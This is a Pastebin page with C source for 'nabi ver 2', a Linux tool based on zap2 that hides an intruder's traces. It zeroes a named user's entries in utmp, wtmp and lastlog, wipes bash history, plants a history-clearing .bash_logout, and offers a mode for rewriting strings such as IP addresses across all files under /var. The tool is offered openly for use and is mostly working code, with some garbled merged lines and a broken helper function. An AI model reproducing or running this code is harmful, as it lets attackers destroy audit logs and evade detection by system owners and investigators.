API tools faq
paste
Advertisement
cybercode

zap2.c

cybercode
Feb 17th, 2012
492
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 7.54 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. Advanced /var log wiper for linux
  3. nabi ver 2 ( friendly zap2.c )
  4.  
  5. Release Date:
  6. nabi ver 2 - 3.8 2006 (Wed)
  7. nabi ver 1 - 1.15 2006 (Sun)
  8.  
  9. 1: zap2)
  10. # ./nabi -z root
  11. 2: history cleanup)
  12. # ./nabi -h
  13. 3: string change)
  14. # ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
  15. # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )
  16.  
  17. Tested on:
  18. - Debian 3.0r1
  19. - RH 9.0
  20. - Fedora core 2
  21. ..
  22. CHANGED:
  23. - add program option parser for split features on this file.
  24. - erased minor version number of this program.
  25.  
  26. BUG FIXED:
  27. - when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
  28. cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
  29. see escape_slash().
  30.  
  31. comment:
  32. i become a curious guy when i'm typing some code. what about you all?
  33. for more useful toolkit. brb!
  34. */
  35.  
  36. #include <stdio.h>
  37. #include <dirent.h>
  38. #include <string.h>
  39. #include <stdlib.h>
  40. #include <sys/types.h>
  41. #include <sys/stat.h>
  42. #include <unistd.h>
  43. #include <sys/file.h>
  44. #include <fcntl.h>
  45. #include <utmp.h>
  46. #include <pwd.h> #include <lastlog.h>
  47. #define MAX_PATH 1024 #define MAX_DEPTH 128 #define PROGRAM "Nabi ver 2 ( geinblues@gmail.com )"
  48. /*
  49. #define DEBUG
  50. */
  51.  
  52. /* proto type */
  53. int insert_node(char *filename);
  54. void load_dir(int cdepth);
  55. void init_list();
  56. void show_list();
  57. void exploit(char *string, char *newstring);
  58. void history_cleanup();
  59. void zap2_main(char *user);
  60. void escape_slash(char *pstr);
  61.  
  62. /* linked-list stuffs for file list */
  63. struct file_list
  64. {
  65. struct file_list *next;
  66. int depth;
  67. char d_name[MAX_PATH];
  68. } *head, *tail;
  69.  
  70. static char root_dir[] = "/var";
  71. int main(int argc, char *argv[])
  72. {
  73. struct dirent *dp;
  74. DIR *dir;
  75. int dumb;
  76. char opt;
  77. char usage[]={
  78. "\n%s\n Usage : %s \n\t-z [username] : zap2 lucky!\n"
  79. "\t-r <original string> <new string> : replace strings in all of files under /var\n"
  80. "\t-h : clear bash history\n\n" };
  81.  
  82. if(argc == 1){
  83. printf(usage, PROGRAM, argv[0]);
  84. return(-1); }
  85.  
  86. /* parsing the single option */ opt = (char)argv[1][1];
  87. switch(opt){
  88. case 'z':
  89. zap2_main(argv[2]);
  90. return(0);
  91. case 'h':
  92. history_cleanup();
  93. return(0);
  94. case 'r':
  95. if(strlen(argv[2]) != strlen(argv[3])){
  96. fprintf(stderr, "must to be two string length is same. \n");
  97. return(-1); }
  98.  
  99. /* initialization linked-list */ init_list();
  100. /* prepare root_dir(/var) is be able to use */
  101. if((dir = opendir(root_dir)) == NULL){
  102. fprintf(stderr, "can't open root directory");
  103. return(-2); }
  104. closedir(dir);
  105.  
  106. /* loading file list into initialized linked-list ( MAX_DEPTH = /var/a/b/c/d... x 128 ) */
  107. for(dumb = 1; dumb < MAX_DEPTH; dumb++){
  108. load_dir(dumb); }
  109.  
  110. #ifdef DEBUG
  111. show_list(); #endif
  112.  
  113. // spoof all your strings like ipaddress under /var directories. exploit(argv[2], argv[3]);
  114. default:
  115. fprintf(stderr, "check your arguments :)\n"); }
  116. return 0; }
  117.  
  118. void init_list()
  119. {
  120. head = (struct file_list *) malloc(sizeof(struct file_list)); tail = (struct file_list *) malloc(sizeof(struct file_list));
  121. head->depth = 1;
  122. strncpy(head->d_name, root_dir, MAX_PATH); head->next = tail;
  123. tail->depth = -1;
  124. tail->next = NULL; }
  125.  
  126. int insert_node(char *filename)
  127. {
  128. struct file_list *ipos;
  129. struct file_list *new_node;
  130. unsigned int cnt_d = 0; char *ifilename;
  131. ifilename = filename;
  132.  
  133. #ifdef DEBUG
  134. printf("insert_node\n");
  135. printf("%s\n", ifilename); #endif
  136. while(*ifilename != '\x00') if(*ifilename++ == '/') cnt_d++;
  137. #ifdef DEBUG
  138. printf("cnt_d = %d\n", cnt_d); #endif
  139.  
  140. for(ipos = head; ipos->next != tail; ipos = ipos->next); //ipos = ipos->next;
  141. if((new_node = (struct file_list *)malloc(sizeof(struct file_list))) == NULL) return(-1);
  142. new_node->depth = cnt_d;
  143. strncpy(new_node->d_name, filename, MAX_PATH); new_node->next = tail; ipos->next = new_node;
  144.  
  145. #ifdef DEBUG
  146. printf("newnode file: %s\n", filename); #endif
  147. return 0; }
  148.  
  149. void load_dir(int cdepth)
  150. {
  151. struct file_list *wpos;
  152. DIR *dir;
  153. struct dirent *dp;
  154. char full_path[MAX_PATH];
  155. int dplen = 0;
  156.  
  157. #ifdef DEBUG
  158. printf("load_dir\n");
  159. #endif
  160.  
  161. for(wpos = head; wpos->next != NULL; wpos = wpos->next){
  162. if(wpos->depth == -1) return;
  163.  
  164. #ifdef DEBUG
  165. printf("wpos->depth : %d cdepth: %d\n", wpos->depth, cdepth);
  166. #endif
  167. if(wpos->depth == cdepth){
  168. // insert cdepth's child directories.
  169. if((dir = opendir(wpos->d_name)) == NULL){
  170. continue; }
  171. while((dp = readdir(dir)) != NULL){
  172. dplen = strlen(dp->d_name);
  173. if(dp->d_name[dplen-1] != '.'){
  174. sprintf(full_path, "%s/%s", wpos->d_name, dp->d_name);
  175. insert_node(full_path);
  176. }
  177. }
  178. closedir(dir);
  179. }
  180. }
  181. wpos = wpos->next; // left last one node hmm ?? }
  182.  
  183. void show_list()
  184. {
  185. struct file_list *spos;
  186.  
  187. #ifdef DEBUG
  188. printf("showlist\n");
  189. #endif
  190.  
  191. for(spos = head; spos->next != NULL; spos = spos->next){
  192. printf("%d: %s\n", spos->depth, spos->d_name);
  193. }
  194. }
  195.  
  196. void escape_slash(char *pstr)
  197. {
  198. char orig[512];
  199. char *tmp;
  200. int pos = 0;
  201. tmp = pstr;
  202. memset(orig, 0, sizeof(orig));
  203.  
  204. while(*tmp != '\x00'){
  205. if(*tmp != '/')
  206. orig[pos++] = *tmp;
  207. else{
  208. orig[pos++] = '\\';
  209. orig[pos++] = '/';
  210. }
  211. tmp++;
  212. }
  213.  
  214. pstr = orig;
  215. #ifdef DEBUG
  216. printf("%s\n", pstr);
  217. #endif
  218. }
  219.  
  220. /* thanks for this nice program sed and mv */
  221. #define NICE_SED "/bin/sed"
  222. #define USEFUL_MV "/bin/mv"
  223. void exploit(char *string, char *newstring)
  224. {
  225. struct file_list *epos;
  226. struct stat nabistat;
  227. char command[512];
  228. char tmp_file[128];
  229.  
  230. if(strlen(string) != strlen(newstring)){
  231. perror("must to be two argument's length is same. \n");
  232. return;
  233. }
  234.  
  235. for(epos = head; epos->next != NULL; epos = epos->next){
  236. lstat(epos->d_name, &nabistat);
  237. if(S_ISREG(nabistat.st_mode)){
  238. #ifdef DEBUG
  239. printf("THIS IS REGULAR FILE>> %s\n", epos->d_name);
  240. #endif
  241. sprintf(tmp_file, "%s.sed", epos->d_name);
  242. escape_slash(string);
  243. escape_slash(newstring);
  244. sprintf(command, "%s 's/%s/%s/g' %s > %s.sed; %s %s %s; rm -rf %s",
  245. NICE_SED, string, newstring, epos->d_name, epos->d_name,
  246. USEFUL_MV, tmp_file, epos->d_name,
  247. tmp_file);
  248.  
  249. // system(command);
  250.  
  251. #ifdef DEBUG
  252. printf("%s\n", command);
  253. #endif
  254. }
  255. }
  256. }
  257.  
  258. void history_cleanup()
  259. {
  260. /* request new machnism for this function */
  261. system("w; last; lastlog; echo > ~/.bash_history");
  262. system("echo 'clear;history -c' > ~/.bash_logout");
  263. }
  264. /*
  265. zap2.c ( combined ).
  266. */
  267.  
  268. #define WTMP_NAME "/var/log/wtmp"
  269. #define UTMP_NAME "/var/run/utmp"
  270. #define LASTLOG_NAME "/var/log/lastlog"
  271. int f;
  272. void kill_utmp(who)
  273. char *who;
  274. {
  275. struct utmp utmp_ent;
  276. if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  277. while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  278. if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  279. bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  280. lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  281. write (f, &utmp_ent, sizeof (utmp_ent));
  282. }
  283. close(f);
  284. }
  285. }
  286.  
  287. void kill_wtmp(who)
  288. char *who;
  289. {
  290. struct utmp utmp_ent;
  291. long pos;
  292. pos = 1L;
  293. if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  294. while(pos != -1L) {
  295. lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  296. if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  297. pos = -1L;
  298. } else {
  299. if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  300. bzero((char *)&utmp_ent,sizeof(struct utmp ));
  301. lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  302. write (f, &utmp_ent, sizeof (utmp_ent));
  303. pos = -1L;
  304. } else pos += 1L;
  305. }
  306. }
  307. close(f);
  308. }
  309. }
  310. void kill_lastlog(who)
  311. char *who;
  312. {
  313. struct passwd *pwd;
  314. struct lastlog newll;
  315. if ((pwd=getpwnam(who))!=NULL) {
  316. if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  317. lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  318. bzero((char *)&newll,sizeof( newll ));
  319. write(f, (char *)&newll, sizeof( newll ));
  320. close(f);
  321. }
  322. } else printf("%s: ?\n",who);
  323. }
  324.  
  325. void zap2_main(char *user)
  326. {
  327. kill_lastlog(user);
  328. kill_wtmp(user);
  329. kill_utmp(user);
  330. printf("nabi: Zap2!\n");
  331. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!